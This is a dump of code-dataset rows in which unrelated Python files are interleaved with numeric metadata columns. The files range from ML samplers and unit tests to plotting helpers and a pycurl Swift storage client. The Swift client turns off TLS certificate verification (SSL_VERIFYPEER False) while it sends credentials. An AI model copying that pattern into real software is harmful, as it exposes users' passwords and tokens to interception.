] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
# NOTE(review): appears to be auto-generated fixture data (sequentially
# numbered placeholder names, all bound to None) — confirm with the
# generator before hand-editing.
name0_0_1_1_0_0_0 = None
name0_0_1_1_0_0_1 = None
name0_0_1_1_0_0_2 = None
name0_0_1_1_0_0_3 = None
name0_0_1_1_0_0_4 = None
| 14.222222
| 24
| 0.820313
| 40
| 128
| 1.875
| 0.175
| 0.16
| 0.466667
| 0.533333
| 0.88
| 0.88
| 0.746667
| 0
| 0
| 0
| 0
| 0.318182
| 0.140625
| 128
| 9
| 25
| 14.222222
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d96a3b0ffc12be282f8517c56713e621eeff5a55
| 127
|
py
|
Python
|
ENTRY_MODULE/ConditionalStatementsAdvanced/LAB/04_Personal_Titles.py
|
sleepychild/ProgramingBasicsPython
|
d96dc4662adc1c8329b731b9c9b7fa4ecf69ec16
|
[
"MIT"
] | null | null | null |
ENTRY_MODULE/ConditionalStatementsAdvanced/LAB/04_Personal_Titles.py
|
sleepychild/ProgramingBasicsPython
|
d96dc4662adc1c8329b731b9c9b7fa4ecf69ec16
|
[
"MIT"
] | 1
|
2022-01-15T10:33:56.000Z
|
2022-01-15T10:33:56.000Z
|
ENTRY_MODULE/ConditionalStatementsAdvanced/LAB/04_Personal_Titles.py
|
sleepychild/ProgramingBasicsPython
|
d96dc4662adc1c8329b731b9c9b7fa4ecf69ec16
|
[
"MIT"
] | null | null | null |
# Read the person's age, then a gender code ('m' = male), and print the
# matching honorific: under 16 -> Master/Miss, 16 or older -> Mr./Ms.
# Input order is unchanged: age first, then the gender code.
age = float(input())
gender = input()
if age < 16:
    title = 'Master' if gender == 'm' else 'Miss'
else:
    title = 'Mr.' if gender == 'm' else 'Ms.'
print(title)
| 25.4
| 49
| 0.519685
| 19
| 127
| 3.473684
| 0.578947
| 0.212121
| 0.242424
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020202
| 0.220472
| 127
| 4
| 50
| 31.75
| 0.646465
| 0
| 0
| 0
| 0
| 0
| 0.141732
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
d96d94940183cd1edffed965a5f1a2ed0e43d1af
| 6,475
|
py
|
Python
|
loader/samplers.py
|
Max-luo-song/fs-map-project
|
4e9d86e182d9a4b969e86b12d72f227e4fd4fd09
|
[
"Apache-2.0"
] | 1
|
2021-08-20T06:22:57.000Z
|
2021-08-20T06:22:57.000Z
|
loader/samplers.py
|
Max-luo-song/fs-map-project
|
4e9d86e182d9a4b969e86b12d72f227e4fd4fd09
|
[
"Apache-2.0"
] | null | null | null |
loader/samplers.py
|
Max-luo-song/fs-map-project
|
4e9d86e182d9a4b969e86b12d72f227e4fd4fd09
|
[
"Apache-2.0"
] | 4
|
2021-08-20T06:23:02.000Z
|
2022-01-06T12:09:07.000Z
|
import torch
import numpy as np
# For segmentation
class CategoriesSampler:
    """Episode sampler for segmentation.

    Each yielded batch contains ``n_per`` data indices for each of ``n_cls``
    randomly chosen non-background classes, interleaved class-wise.

    Modes:
      * ``'rand'``  -- fresh random batches every iteration (default);
      * ``'probe'`` -- random batches, each recorded in ``fixed_batches``;
      * ``'fix'``   -- replay the previously recorded batches verbatim.

    Changes vs. original: removed a leftover debug ``print(labels)`` (the
    sibling ``CategoriesSampler_v11`` has the same line commented out) and
    factored the duplicated rand/probe sampling into ``_sample_batch``.
    """

    def __init__(self, all_labels, label_stat, n_batch, n_cls, n_per):
        self.n_batch = n_batch  # the number of iterations in the dataloader
        self.n_cls = n_cls      # classes per batch
        self.n_per = n_per      # samples per class
        # sanity check: every class must hold at least n_per instances
        for k, n in label_stat.items():
            assert n >= self.n_per
        self.label_stat = label_stat
        labels = np.array(sorted(list(self.label_stat.keys())))  # all class ids
        all_labels = np.array(all_labels)  # per-sample label array
        self.m_ind = {}  # class id -> tensor of data indices of that class
        for i in labels:
            ind = np.argwhere(all_labels == i).reshape(-1)  # all data index of this class
            ind = torch.from_numpy(ind)
            self.m_ind[i] = ind
        self.labels = labels
        # discard bg class 0 (assumes labels[0] is the background class)
        self.num_labels = len(self.labels) - 1
        self.fixed_batches = []
        self.fixed_batches_classes = []
        self.mode = 'rand'  # 'probe', 'fix'

    def __len__(self):
        return self.n_batch

    def _sample_batch(self):
        """Draw one episode: n_per indices for each of n_cls random classes."""
        batch = []
        classes = torch.randperm(self.num_labels)[:self.n_cls]  # random class slots
        for c in classes:
            cls = self.labels[c + 1]  # +1 skips the bg class at labels[0]
            l = self.m_ind[cls]       # all data indices of this class
            pos = torch.randperm(len(l))[:self.n_per]  # sample n_per of them
            batch.append(l[pos])
        return batch

    def __iter__(self):
        if self.mode == 'rand':
            for i_batch in range(self.n_batch):
                batch = self._sample_batch()
                # .t() before reshape interleaves classes (abcdabcd...)
                # instead of grouping them (aaaabbbb...).
                yield torch.stack(batch).t().reshape(-1)
        elif self.mode == 'probe':
            for i_batch in range(self.n_batch):
                batch = self._sample_batch()
                self.fixed_batches.append(batch)  # remember for 'fix' replay
                yield torch.stack(batch).t().reshape(-1)
        else:
            assert self.mode == 'fix'
            assert len(self.fixed_batches) == self.n_batch
            for ix, batch in enumerate(self.fixed_batches):
                yield torch.stack(batch).t().reshape(-1)
# For segmentation
# not deterministic for validation
class CategoriesSampler_v11:
    """Like ``CategoriesSampler``, but classes with fewer than ``n_per``
    samples are silently dropped instead of asserted on (not deterministic;
    intended for validation).

    Fix vs. original: the under-populated classes were deleted from
    ``label_stat`` while iterating ``label_stat.items()``, which raises
    ``RuntimeError: dictionary changed size during iteration``; we now
    iterate over a snapshot of the items.
    """

    def __init__(self, all_labels, label_stat, n_batch, n_cls, n_per):
        self.n_batch = n_batch  # the number of iterations in the dataloader
        self.n_cls = n_cls      # classes per batch
        self.n_per = n_per      # samples per class
        # drop classes that cannot fill a batch (snapshot avoids mutating
        # the dict while iterating it)
        for k, n in list(label_stat.items()):
            if n < self.n_per:
                del label_stat[k]
        self.label_stat = label_stat
        labels = np.array(sorted(list(self.label_stat.keys())))  # remaining class ids
        all_labels = np.array(all_labels)  # per-sample label array
        self.m_ind = {}  # class id -> tensor of data indices of that class
        for i in labels:
            ind = np.argwhere(all_labels == i).reshape(-1)  # all data index of this class
            ind = torch.from_numpy(ind)
            self.m_ind[i] = ind
        self.labels = labels
        self.num_labels = len(self.labels) - 1  # discard bg class 0

    def __len__(self):
        return self.n_batch

    def __iter__(self):
        for i_batch in range(self.n_batch):
            batch = []
            classes = torch.randperm(self.num_labels)[:self.n_cls]  # random class slots
            for c in classes:
                cls = self.labels[c + 1]  # +1 skips the bg class at labels[0]
                l = self.m_ind[cls]       # all data indices of this class
                pos = torch.randperm(len(l))[:self.n_per]  # sample n_per of them
                batch.append(l[pos])
            # .t() before reshape interleaves classes (abcdabcd...) instead
            # of grouping them (aaaabbbb...).
            yield torch.stack(batch).t().reshape(-1)
class CategoriesClassificationSampler:
    """Episodic sampler for classification: every yielded batch interleaves
    ``n_per`` data indices from each of ``n_cls`` randomly drawn classes."""

    def __init__(self, all_label, split_label, n_batch, n_cls, n_per):
        self.n_batch = n_batch  # iterations per epoch (dataloader length)
        self.n_cls = n_cls      # classes per batch
        self.n_per = n_per      # samples per class
        self.split_label = split_label
        labels_arr = np.array(all_label)  # label of every sample
        # One index tensor per class id 0..max(label).
        self.m_ind = [
            torch.from_numpy(np.argwhere(labels_arr == cls_id).reshape(-1))
            for cls_id in range(max(labels_arr) + 1)
        ]

    def __len__(self):
        return self.n_batch

    def __iter__(self):
        for _ in range(self.n_batch):
            chosen = torch.randperm(len(self.m_ind))[:self.n_cls]  # random classes
            per_class = []
            for cls_id in chosen:
                candidates = self.m_ind[cls_id]  # all indices of this class
                picks = torch.randperm(len(candidates))[:self.n_per]
                per_class.append(candidates[picks])
            # Transpose before flattening so classes interleave
            # (abcdabcd...) rather than group (aaaabbbb...).
            yield torch.stack(per_class).t().reshape(-1)
| 39.242424
| 112
| 0.567104
| 887
| 6,475
| 3.961669
| 0.114994
| 0.044109
| 0.031303
| 0.02988
| 0.833523
| 0.833523
| 0.833523
| 0.833523
| 0.823278
| 0.823278
| 0
| 0.005122
| 0.33668
| 6,475
| 164
| 113
| 39.481707
| 0.813038
| 0.27305
| 0
| 0.745455
| 0
| 0
| 0.003441
| 0
| 0
| 0
| 0
| 0
| 0.027273
| 1
| 0.081818
| false
| 0
| 0.018182
| 0.027273
| 0.154545
| 0.009091
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7944dceebbcb826ba9c50a7f7916bbeca6b14436
| 272
|
py
|
Python
|
examples/where.py
|
nahid/py-jsonq
|
badfde55ab369e8daf1dcb36dfe782d808afe6a3
|
[
"MIT"
] | null | null | null |
examples/where.py
|
nahid/py-jsonq
|
badfde55ab369e8daf1dcb36dfe782d808afe6a3
|
[
"MIT"
] | null | null | null |
examples/where.py
|
nahid/py-jsonq
|
badfde55ab369e8daf1dcb36dfe782d808afe6a3
|
[
"MIT"
] | 1
|
2019-09-20T01:27:33.000Z
|
2019-09-20T01:27:33.000Z
|
from pyjsonq.query import JsonQ
def _fetch_barisal_users():
    # Build a fresh JsonQ instance and run the same chained query:
    # users with id > 3 located in "Barisal".
    return JsonQ("./data.json").at("users").where("id", ">", 3).where("location", "=", "Barisal").get()

e1 = _fetch_barisal_users()
print("result", e1)

e2 = _fetch_barisal_users()
print("result", e2)
| 27.2
| 97
| 0.584559
| 37
| 272
| 4.297297
| 0.513514
| 0.113208
| 0.163522
| 0.188679
| 0.779874
| 0.779874
| 0.779874
| 0.779874
| 0.779874
| 0.779874
| 0
| 0.02439
| 0.095588
| 272
| 9
| 98
| 30.222222
| 0.621951
| 0
| 0
| 0
| 0
| 0
| 0.301471
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0.4
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7985f756beb32b088b8c92bc85f429e3c0e29df6
| 4,603
|
py
|
Python
|
tests/test_audios.py
|
Desenho2018-1/tatics-framework
|
46a9ea99eeb46fdc5a048c41fa478cbfaeb1ee85
|
[
"MIT"
] | 4
|
2018-06-08T00:49:54.000Z
|
2021-08-06T04:45:04.000Z
|
tests/test_audios.py
|
Desenho2018-1/tatics-framework
|
46a9ea99eeb46fdc5a048c41fa478cbfaeb1ee85
|
[
"MIT"
] | 28
|
2018-05-29T11:32:53.000Z
|
2019-10-22T18:30:55.000Z
|
tests/test_audios.py
|
rodrigocam/simian
|
157a7424f28bd0656a4e400817b561ffc987ddd5
|
[
"MIT"
] | 2
|
2018-06-30T02:46:22.000Z
|
2020-04-30T15:17:04.000Z
|
import unittest
import pygame
from simian.audio.audios import Sound, Music
from simian.audio.audio_manager import AudioManager
class SoundTest(unittest.TestCase):
    """Construction and playback tests for the Sound and Music wrappers."""

    def setUp(self):
        self.audio_manager = AudioManager()

    def test_should_create_sound(self):
        # Creating a sound from an existing asset must not raise.
        created = True
        try:
            Sound('sound.wav')
        except:
            created = False
        self.assertTrue(created)

    def test_should_not_create_sound(self):
        # A missing asset must raise during construction.
        raised = False
        try:
            Sound('doesnt_exist.wav')
        except:
            raised = True
        self.assertTrue(raised)

    def test_should_play_sound(self):
        # Playback of an existing sound reports success.
        self.assertTrue(Sound('sound.wav').play())

    def test_should_not_play_sound(self):
        # Construction of a missing asset raises before play() can succeed.
        raised = False
        try:
            sound = Sound('doesnt_exist.wav')
            sound.play()
        except:
            raised = True
        self.assertTrue(raised)

    def test_should_play_music(self):
        # Playback of an existing music track reports success.
        self.assertTrue(Music('music.mp3').play())
class AudioManagerTest(unittest.TestCase):
    """Tests for AudioManager music/sound management.

    The suite's style is try/except with assertTrue flags (bare excepts are
    kept to match the rest of the file). Two copy-paste defects fixed:

    * ``test_should_not_stop_sound`` called ``fade_out_sound`` instead of
      ``stop_sound`` (there is a separate not_fade_out test already);
    * ``test_should_fade_out_sound`` had its success/failure assertions
      inverted relative to its ``test_should_fade_out_music`` counterpart.
    """

    def test_should_construct_music(self):
        self.audio_manager = AudioManager()
        self.assertTrue(self.audio_manager.music is None)
        self.assertTrue(not self.audio_manager.sounds)

    def test_should_play_music(self):
        self.audio_manager = AudioManager()
        response = self.audio_manager.play_music('music.mp3')
        self.assertTrue(response)

    def test_should_not_play_music(self):
        self.audio_manager = AudioManager()
        try:
            self.audio_manager.play_music('doesnt_exist.mp3')
            self.assertTrue(False)
        except:
            self.assertTrue(True)

    def test_should_stop_music(self):
        self.audio_manager = AudioManager()
        self.audio_manager.play_music('music.mp3')
        try:
            self.audio_manager.stop_music()
            self.assertTrue(True)
        except:
            self.assertTrue(False)

    def test_should_not_stop_music(self):
        self.audio_manager = AudioManager()
        try:
            self.audio_manager.stop_music()
            self.assertTrue(False)
        except:
            self.assertTrue(True)

    def test_should_fade_out_music(self):
        self.audio_manager = AudioManager()
        self.audio_manager.play_music('music.mp3')
        try:
            self.audio_manager.fade_out_music(1)
            self.assertTrue(True)
        except:
            self.assertTrue(False)

    def test_should_not_fade_out_music(self):
        self.audio_manager = AudioManager()
        try:
            self.audio_manager.fade_out_music(1)
            self.assertTrue(False)
        except:
            self.assertTrue(True)

    def test_should_add_sound(self):
        self.audio_manager = AudioManager()
        self.assertTrue(self.audio_manager.add_sound('sound.wav'))

    def test_should_play_sound(self):
        self.audio_manager = AudioManager()
        self.audio_manager.add_sound('sound.wav')
        try:
            self.audio_manager.play_sound('sound.wav')
            self.assertTrue(True)
        except:
            self.assertTrue(False)

    def test_should_not_play_sound(self):
        self.audio_manager = AudioManager()
        try:
            self.audio_manager.play_sound('doesnt_exist')
            self.assertTrue(False)
        except:
            self.assertTrue(True)

    def test_should_stop_sound(self):
        self.audio_manager = AudioManager()
        self.audio_manager.add_sound('sound.wav')
        self.audio_manager.play_sound('sound.wav')
        try:
            self.audio_manager.stop_sound('sound.wav')
            self.assertTrue(True)
        except:
            self.assertTrue(False)

    def test_should_not_stop_sound(self):
        self.audio_manager = AudioManager()
        try:
            # Fixed: exercise stop_sound (was fade_out_sound by copy-paste).
            self.audio_manager.stop_sound('sound.wav')
            self.assertTrue(False)
        except:
            self.assertTrue(True)

    def test_should_fade_out_sound(self):
        self.audio_manager = AudioManager()
        self.audio_manager.add_sound('sound.wav')
        self.audio_manager.play_sound('sound.wav')
        try:
            # Fixed: fading out a playing sound is the success case
            # (assertions were inverted in the original).
            self.audio_manager.fade_out_sound('sound.wav', 1)
            self.assertTrue(True)
        except:
            self.assertTrue(False)

    def test_should_not_fade_out_sound(self):
        self.audio_manager = AudioManager()
        try:
            self.audio_manager.fade_out_sound('sound.wav', 1)
            self.assertTrue(False)
        except:
            self.assertTrue(True)
| 28.067073
| 66
| 0.620899
| 522
| 4,603
| 5.214559
| 0.08046
| 0.167524
| 0.217487
| 0.110213
| 0.873622
| 0.837619
| 0.796106
| 0.739162
| 0.702057
| 0.702057
| 0
| 0.002732
| 0.28438
| 4,603
| 163
| 67
| 28.239264
| 0.823619
| 0
| 0
| 0.742188
| 0
| 0
| 0.046274
| 0
| 0
| 0
| 0
| 0
| 0.265625
| 1
| 0.15625
| false
| 0
| 0.03125
| 0
| 0.203125
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
79ad4de72e064ac3201e520cb29162f873e95096
| 1,865
|
py
|
Python
|
tabular data/regression/Benchmarks/4. gpu performances/plotFunctions/PlotMSEDiscr.py
|
RemilYoucef/SPLITSD4X
|
e7625a4d649e7d61bebcf193d956c5d73ee5e08b
|
[
"MIT"
] | 2
|
2021-02-10T08:29:19.000Z
|
2021-04-29T14:33:31.000Z
|
tabular data/regression/Benchmarks/5. temperature forecast/plotFunctions/PlotMSEDiscr.py
|
RemilYoucef/SPLITSD4X
|
e7625a4d649e7d61bebcf193d956c5d73ee5e08b
|
[
"MIT"
] | null | null | null |
tabular data/regression/Benchmarks/5. temperature forecast/plotFunctions/PlotMSEDiscr.py
|
RemilYoucef/SPLITSD4X
|
e7625a4d649e7d61bebcf193d956c5d73ee5e08b
|
[
"MIT"
] | null | null | null |
'''
Created on Mar 28, 2020
@author: anesbendimerad
'''
from plotFunctions.PlotCurves import plotOneCase
def _plot_mse_disc(case, path, data_filename, results_prefix):
    """Shared implementation for the MSE-discretization plots.

    Reads per-generation MSE values from ``path + data_filename`` (lines are
    either a ``Generation_<i>`` section header or a float value) and renders
    one curve per generation to ``FIGURES/<results_prefix><case>.png``.
    """
    resultsPath = "FIGURES/" + results_prefix + case + ".png"
    title = case
    nbObjects = float(1)  # divisor for normalizing values (currently 1)
    keys = ["Generation_" + str(i) for i in range(1, 8)]
    legends = ["k = " + str(k) for k in range(4, 11)]
    yValues = [[] for _ in range(7)]  # one value series per generation
    index = -1  # current generation section; -1 until a header is seen
    with open(path + data_filename, "r") as f:
        for line in f:
            # Section headers switch the target series; other lines are data.
            if line.replace("\n", "").replace("\r", "") in keys:
                index += 1
            else:
                yValues[index].append(float(line) / nbObjects)
    xValues = [i + 1 for i in range(len(yValues[0]))]
    plotOneCase(xValues, yValues, "# subgroups (K)", "MSE", legends,
                resultsPath, title, useMarker=[True] * 7,
                legendsLoc="upper right",
                markevery=int(15 * len(xValues) / 100))

def plotMSEDiscFreq(case, path):
    """Plot MSE curves for the equal-frequency discretization run."""
    _plot_mse_disc(case, path, "mse_disc_freq.txt", "MSE_Disc_Freq")

def plotMSEDiscWidth(case, path):
    """Plot MSE curves for the equal-width discretization run."""
    _plot_mse_disc(case, path, "MSE_Disc_Width.txt", "MSE_Disc_Width")
| 39.680851
| 196
| 0.597855
| 252
| 1,865
| 4.337302
| 0.293651
| 0.087832
| 0.10979
| 0.117109
| 0.874657
| 0.874657
| 0.814273
| 0.814273
| 0.814273
| 0.814273
| 0
| 0.040027
| 0.196247
| 1,865
| 47
| 197
| 39.680851
| 0.689126
| 0.041287
| 0
| 0.787879
| 0
| 0
| 0.221597
| 0.024184
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060606
| false
| 0
| 0.030303
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
79da709041d4bf7c39a4dc10e2e9b0cb7e824953
| 32,712
|
py
|
Python
|
SwiftFunction.py
|
SongBS/SwiftManager
|
2fdb7fe8987139b9b050c77a5d711bcdae2d1a62
|
[
"Apache-2.0"
] | null | null | null |
SwiftFunction.py
|
SongBS/SwiftManager
|
2fdb7fe8987139b9b050c77a5d711bcdae2d1a62
|
[
"Apache-2.0"
] | null | null | null |
SwiftFunction.py
|
SongBS/SwiftManager
|
2fdb7fe8987139b9b050c77a5d711bcdae2d1a62
|
[
"Apache-2.0"
] | null | null | null |
#-*-coding:cp949-*-
'''
Created on 2013. 6. 24.
@author: sbs@gabia.com
'''
import wx
import os
import pycurl
import cStringIO
import DialogClass
import json
def progress(download_t, download_d, upload_t, upload_d):
    # pycurl progress callback: dumps the raw transfer counters
    # (totals and completed bytes for download/upload) to stdout.
    # NOTE(review): Python 2 print statements — this module is Python 2 only.
    print "Total to download", download_t
    print "Total downloaded", download_d
    print "Total to upload", upload_t
    print "Total uploaded", upload_d
def SwiftAuth(self):
    """Authenticate against the Swift auth endpoint and cache credentials.

    Sends the v1-auth X-Storage-User/Pass headers to ``self.swift_url`` via
    pycurl. On HTTP 200, parses ``self.authToken`` and ``self.storageUrl``
    out of the response headers and logs them to ``self.textControl``; on
    any other status, shows a message box and logs the failure in red.
    """
    headerBuf = cStringIO.StringIO()
    bodyBuf = cStringIO.StringIO()
    # Swift v1 auth headers; New-Token/Token-Lifetime are optional extensions.
    requestHeader = "X-Storage-User: %s:%s\r\nX-Storage-Pass: %s\r\nX-Auth-New-Token: %s\r\nX-Auth-Token-Lifetime: %s\r\n\r\n" \
    %(self.swift_account, self.swift_user, self.swift_passwd, self.swift_tokenNew, self.swift_tokenTTL)
    c = pycurl.Curl()
    c.setopt(pycurl.URL, self.swift_url)
    c.setopt(pycurl.SSL_VERIFYPEER, False)  # NOTE(review): disables TLS certificate verification
    c.setopt(pycurl.VERBOSE, False)
    c.setopt(pycurl.TCP_NODELAY, True)
    c.setopt(pycurl.HTTPHEADER, [requestHeader])
    c.setopt(pycurl.CUSTOMREQUEST, "GET")
    c.setopt(c.HEADERFUNCTION, headerBuf.write)
    c.setopt(c.WRITEFUNCTION, bodyBuf.write)
    c.perform()
    rtn = c.getinfo(c.HTTP_CODE)
    if not(rtn == 200):
        wx.MessageBox('User Authentication Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
        self.textControl.AppendText(">User Authentication Failed\r\n")
        #self.textControl.AppendText(requestHeader)
        #self.textControl.AppendText(headerBuf.getvalue())
        #self.textControl.AppendText(bodyBuf.getvalue())
        self.textControl.AppendText("\r\n\r\n")
        self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
    else:
        # Scan the raw response headers for token, storage URL and expiry.
        for x in headerBuf.getvalue().splitlines():
            sLine = x.split(":", 1)
            if "X-Auth-Token" in sLine :
                self.authToken = sLine[1].strip()
            if "X-Storage-Url" in sLine :
                self.storageUrl = sLine[1].strip()
            if "X-Auth-Token-Expires" in sLine:
                tokenTTL = sLine[1].strip()
        # NOTE(review): tokenTTL is unbound (NameError on the log line below)
        # if the server omits X-Auth-Token-Expires — confirm the server
        # always sends that header.
        self.textControl.AppendText(">User Authentication Success\r\n")
        self.textControl.AppendText("X-Auth-Token: %s \r\n" %self.authToken)
        self.textControl.AppendText("X-Storage-Path: %s \r\n" %self.storageUrl)
        self.textControl.AppendText("Token Expire: %s \r\n" %tokenTTL)
        #self.textControl.AppendText(requestHeader)
        #self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
        #self.textControl.AppendText(headerBuf.getvalue())
        #self.textControl.AppendText(bodyBuf.getvalue())
        #self.textControl.AppendText("\r\n\r\n")
        #self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
    #self.textControl.Clear()
    #self.textControl.SetValue(requestHeader)
    #self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
    #self.textControl.AppendText(headerBuf.getvalue())
    #self.textControl.AppendText(bodyBuf.getvalue())
    #self.textControl.SetInsertionPoint(1)
    headerBuf.close()
    bodyBuf.close()
    c.close()
    return
def ListContainer(self):
    """List the account's containers.

    GETs ``self.storageUrl?format=json`` with the cached auth token and
    prints each container's name, file count and byte total to
    ``self.textControl``. Requires a prior successful ``SwiftAuth``.
    """
    if self.authToken == "":
        wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    headerBuf = cStringIO.StringIO()
    bodyBuf = cStringIO.StringIO()
    requestHeader = "X-AUth-Token: %s\r\n\r\n" %(self.authToken)
    c = pycurl.Curl()
    c.setopt(pycurl.URL, self.storageUrl+"?format=json")
    c.setopt(pycurl.SSL_VERIFYPEER, False)
    c.setopt(pycurl.VERBOSE, False)
    c.setopt(pycurl.TCP_NODELAY, True)
    c.setopt(pycurl.HTTPHEADER, [requestHeader])
    c.setopt(pycurl.CUSTOMREQUEST, "GET")
    c.setopt(c.HEADERFUNCTION, headerBuf.write)
    c.setopt(c.WRITEFUNCTION, bodyBuf.write)
    c.perform()
    rtn = c.getinfo(c.HTTP_CODE)
    if not(rtn == 200):
        if (rtn == 404):
            # 404 here means the account holds no containers yet.
            self.textControl.AppendText("<EMPTY>\r\n")
        else:
            wx.MessageBox('Show Container List Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
            self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
            self.textControl.AppendText(">Show Container List Failed\r\n")
            self.textControl.AppendText(headerBuf.getvalue())
            self.textControl.AppendText(bodyBuf.getvalue())
            self.textControl.AppendText("\r\n\r\n")
            self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
    else:
        self.textControl.AppendText(">Show Container List Success\r\n")
        self.textControl.AppendText("--------------------------------------------------------------------------------------\r\n")
        self.textControl.AppendText("[Name]\t\t[Files]\t\t[Bytes]\r\n")
        self.textControl.AppendText("--------------------------------------------------------------------------------------\r\n")
        # JSON body: list of {'name', 'count', 'bytes'} per container.
        decoded = json.loads(bodyBuf.getvalue())
        for i in decoded:
            self.textControl.AppendText("%s\t\t%s\t\t%s\t\t\r\n" %(i['name'], i['count'], i['bytes']))
        self.textControl.AppendText("\r\n")
    headerBuf.close()
    bodyBuf.close()
    c.close()
def SelectContainer(self):
    """Prompt for a container name and remember it as the working container.

    Stores the (stripped, UTF-8 encoded) name in ``self.selectedContainer``
    for subsequent object operations. No server round-trip is made, so an
    unknown container name is not detected here.
    """
    if self.authToken == "":
        wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    textDialog = wx.TextEntryDialog(self, 'Enter a Container Name to Use', 'Notices', '', wx.OK|wx.CANCEL|wx.CENTRE)
    if textDialog.ShowModal() == wx.ID_OK:
        self.selectedContainer = textDialog.GetValue().strip()
        # NOTE(review): encode() yields str on Python 2; under Python 3 this
        # would leave bytes in selectedContainer — module appears Py2-only.
        self.selectedContainer = self.selectedContainer.encode('utf-8')
        self.textControl.AppendText(">Container Change Success\r\n")
        self.textControl.AppendText("Container Selected: %s\r\n\r\n" %self.selectedContainer)
    textDialog.Destroy()
def CreateContainer(self):
    """Prompt for a container name and create it via an HTTP PUT.

    Swift answers 201 (created) or 202 (already exists) on success; any
    other status is reported as a failure in the text control.
    """
    if self.authToken == "":
        wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    containerUrl = ""
    textDialog = wx.TextEntryDialog(self, 'Enter a Container Name to Create', 'Create Container', '', wx.OK|wx.CANCEL|wx.CENTRE)
    if textDialog.ShowModal() == wx.ID_OK:
        containerUrl = textDialog.GetValue().strip()
        containerUrl = containerUrl.encode('utf-8')
    textDialog.Destroy()
    if containerUrl == "":
        # Covers both an empty entry and a cancelled dialog.
        self.EmptyInput()
        return
    headerBuf = cStringIO.StringIO()
    bodyBuf = cStringIO.StringIO()
    requestHeader = "X-Auth-Token: %s\r\n\r\n" %(self.authToken)
    c = pycurl.Curl()
    c.setopt(pycurl.URL, self.storageUrl+"/"+containerUrl)
    c.setopt(pycurl.SSL_VERIFYPEER, False)
    c.setopt(pycurl.VERBOSE, False)
    c.setopt(pycurl.TCP_NODELAY, True)
    c.setopt(pycurl.HTTPHEADER, [requestHeader])
    c.setopt(pycurl.CUSTOMREQUEST, "PUT")
    c.setopt(c.HEADERFUNCTION, headerBuf.write)
    c.setopt(c.WRITEFUNCTION, bodyBuf.write)
    c.perform()
    rtn = c.getinfo(c.HTTP_CODE)
    if not(rtn == 201 or rtn == 202) :
        wx.MessageBox('Container Create Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
        self.textControl.AppendText(">Container Create Failed\n")
        self.textControl.AppendText(headerBuf.getvalue())
        self.textControl.AppendText(bodyBuf.getvalue())
        self.textControl.AppendText("\r\n\r\n")
        self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
    else:
        self.textControl.AppendText(">Create Container Success\r\n")
        self.textControl.AppendText("Created Container :%s\r\n\r\n" %containerUrl)
    headerBuf.close()
    bodyBuf.close()
    c.close()
    return
def DeleteContainer(self):
    """Prompt for a container name and delete it via an HTTP DELETE.

    Swift answers 204 on success; any other status (e.g. 404 missing,
    409 non-empty container) is reported as a failure in the text control.
    """
    if self.authToken == "":
        wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
        return
    containerUrl = ""
